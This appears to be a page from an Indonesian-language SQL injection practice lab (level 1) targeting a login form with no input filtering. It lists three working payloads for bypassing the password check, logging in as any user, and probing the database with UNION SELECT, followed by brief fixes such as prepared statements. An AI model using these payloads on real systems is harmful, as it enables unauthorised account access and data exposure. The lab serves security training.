+-----------------------------+
| SQLi Level 1 |
+-----------------------------+
🎯 Target: Form login tanpa filter input.
🎯 Tujuan: Masuk ke akun tanpa tahu password.
📌 Cara Eksploitasi:
Masukkan payload:
Username: admin' -- → untuk bypass password
Username & password: ' OR '1'='1 → untuk login siapa saja
Username: ' UNION SELECT null, sqlite_version(), null-- → untuk coba eksplorasi DB
🔒 Cara Patching:
- Gunakan prepared statements
- Hindari interpolasi string langsung di query SQL
← Kembali ke daftar level